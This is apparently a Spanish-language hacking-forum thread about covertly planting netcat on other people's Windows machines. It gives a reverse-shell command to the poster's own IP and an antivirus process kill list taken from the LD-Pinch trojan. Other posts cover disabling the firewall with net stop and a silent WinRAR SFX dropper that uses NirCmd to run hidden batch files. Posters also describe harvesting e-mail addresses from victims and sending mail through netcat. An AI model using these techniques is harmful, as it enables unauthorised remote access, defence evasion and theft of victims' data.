Una lista de procesos:

    APVDWIN.exe
    Avp32.exe
    avpcc.exe
    AVWUpSrv
    cmd.exe
    command.com
    iamapp.exe
    kavsvc
    navpw32.exe
    NOD32krn
    NOD32KRN.exe
    NOD32KUI.exe
    NPFMntor
    outpostfirewall
    PAVSRV51.exe
    PccPfw.exe
    PTstartmon.exe
    SNDSrvc
    TroyanFindInfo.exe
    VSMON.exe
    WEBPROXY.exe
    ZAPRO.exe

Es la que usa el troyano LD-Pinch, pero no te servirá de mucho porque son procesos que no se dejan detener así como así, o sea, no es tan simple, necesitas investigar cómo detener a un cierto proceso y evitar que se reinicie 

Hola, de nuevo yo. Estuve probando, y logré obtener la shell de un amigo, aunque casi enseguida se corto la conexion por el firewall que el usaba. Mi pregunta es: Si tengo varias máquinas intentando conectarse a la mía, cómo puedo hacer?
Leí que renombraban el nc en la máquina de la víctima pero en ese caso tendría que renombrarlo tamb en la mía no?
Quisiera que me aclaren ese tema, nada mas, grax...

Grax...se agradece!!!

A ver, otra vez yo...estuve probandocon el minirelay y logré mandar mis Mails a mi cuenta en yahoo, pero hotmail me los rebota por política de la empresa. No puede ser que esté baneado por bomber ni nada de eso, hice ping y responde, pero me sigue rebotando los Mails.

Y otra cosa. Uso speedy y me brinda una IP dinámica. Si quiero hacer que una Máquina remota se conecte a mi PC cada tanto, yo escribo:

nc -d -e cmd.exe miip 3000

cosa que crearía una inversa por el puerto 3000, el problema es que mi IP cambia cada vez que me conecto ¿Es lo mismo si uso el nombre de mi equipo? (Pregunto como para no ponerme a probar...XD)

Grax...me imagine que seria por algo de eso, y por tu pag, el reshack no lo puedo descargar...y no te hagas problema porque no este terminada, iespana tiene esa forma fea de publicar subiendo los ficheros desde la PC...¬¬...me gustaba mas la forma que ofrece zerocatch de modificar los documentos html manualmente desde el mismo servidor. Yo tengo estancado un link en mi web, ya que saque una nueva herramientita para limpiarse de algunas infecciones, y todavia no la reemplace, deje el link ahi nomas...jeje
Por cierto, leí por ahi que estabas compilando una nueva de netcat... se me ocurre compilar un servernc.exe como servidor y un clientnc.exe como cliente...ahora me estoy fijando como llegar a hacerlo, pero no ando con mucho tiempo. Probablemente me fije como mejorar las características de servidor de nc...
Bueno, gracias por la rta XDXD   see you later man!

Bueno si vamos al caso tambien podemos hacer un vbs pero me parecio que trabajar con lo de siempre es mas comodo...me sale el vago de adentro. Por cierto, intente mandar un mail desde nc con lo de type mjeberreta.txt|nc -vv -w 10 mail.speedy.com.ar 25...el tema es que me saca un error. Use como smtp el mail.speedy.com.ar que es el que mi viejo usa en el outlook como correo de salida. No se porque me pone estos errores:

220 galga.terra.com ESMTP
503 <Anonimo>: Helo command rejected: Improper use of SMTP command pipelining
503 Error: send HELO/EHLO first
503 Error: need MAIL command
503 Error: need RCPT command
221 Error: I can break rules, too. Goodbye.

no cazo porque???

A ver, mejor me explico porque lo lei y no se entiende nada...
Uno de los bats (pongamosle run.bat) tiene que decir:


Obviamente vas a tener otro llamado runme.bat que metera netcat, y hara todo el lio sin mostrar nada. Tambien deberas incluir en ese caso el nircmd. Yo lo suelo renombrar como algo mas creativo como nir o com...jeje En ese caso el comando debe ser nir execmd runme.bat o com execmd runme.bat.
El otro tendra algo como


Y blablabla todos los que quieras...total el usuario no lo ve.

Mmm...Cuando creas un SFX en WinRar el comentario no se toca ya que tiene el script SFX para la descompresión. Lo de net stop son comandos para la consola, los pones en un bat.
Para hacer todo junto podes crear el sfx (yo los creo siempre en formato zip que me parece mas simple), vas a la solapa de avanzadas > opciones del SFX, configuras todo a gusto y pones aceptar...ahora en la solapa comment te tendría que aparecer algo como.

Ese es para un antiWorm que estoy desarrollando. Fijate que crea dos shortcuts, tiene un texto y lo de Setup=TOK.bat es la parte que va a ejecutar el TOK.bat cuando se termine la descompresion. Si en la parte de modos usas el modo silencioso no tiene dialogo asi que vas a ver que ese TOK.bat (eso para mi caso) se ejecuta solito, ya que la descompresion se hizo sin decir nada...
Podes desde el mismo bat hacer todo junto...pero en general a mi me gusta mandar tambien NirCmd en el paquete y usar dos bats, uno llama al otro con nircmd execmd que es una orden para ejecutar lo que le pedimos sin mostrar nada. Hay una forma de hacerlo sin Nir (en cmd), pero no me la acuerdo...
Bueno, lo que obtenes mandando el paquete con nir, nc y esos dos bats es la posibilidad de que el segundo bat se ejecute sin mostrar nada de nada...asi que podes hacer cositas que lleven tiempo y el usuario no podra notarlo, a menos que hagas cosas que requieran trabajo, en ese caso el usuario puede notar que su pc esta haciendo algo. Pero si logras meter NetCat haces un scan de las direcciones de E-Mail, las mandas a un txt y despues usas ese txt desde netcat para enviar correos, o lo que quieras!!! Es mucho lo que se puede hacer si lograste meter todo, y si el bat se ejecuta en silencio significa que le podes escanear practicamente toda la maquina, ya que eso no hace mucho alarde...jeje

Bueno, jaja! supongo que eso sera para WHK...

yo tambien tenia un vago proyecto de hacer un SO mas lindo...ahora estaba viendo que por aca hay otro grupo asi que se llama grupo solar...no se si estan trabajando en un SO, lo que se es que trabajan con software libre...igual por ahora hay que esperar un poquito y prepararse para los nuevos microprocesadores Intel y AMD (competencia pura... XD) y el nuevo monitor de Microsoft...porque si no vas con esa tecnologia le das el lugar a microsoft de tomar el mercado.

Creo que sobre el firewall no me di a entender, es decir, esa es la parte facil ya que el firewall de windows es facil de burlar y/o desactivar. A propósito sobre ésto a veces aparece como "Windows Firewall/Internet Connection Sharing (ICS)", aunque cabe probar simplemente net stop SharedAccess, supongo que sabras eso pero puede serle util a otro que lo lea.
Respecto al antivirus he intentado con net stop "Active Virus Shield" que es el nombre con el que aparece el servicio del mismo, pero lo que obtengo es un error ya que la detencion o interrupcion no es valida para ese servicio, es decir que ese servicio no acepta el comando net stop
Bien, lei que el LD-Pinch (conocido troyano) logra con exito detener los procesos de algunos antivirus, como pavsrv51 (panda antivirus), supongo que se podrá con taskkill, o con NirCmd killprocess, pero no creo que me sirva para mucho. El tema es lograr que una maquina ajena no reconozca que le meti netcat...pero es todo un trabajito de investigacion, jaja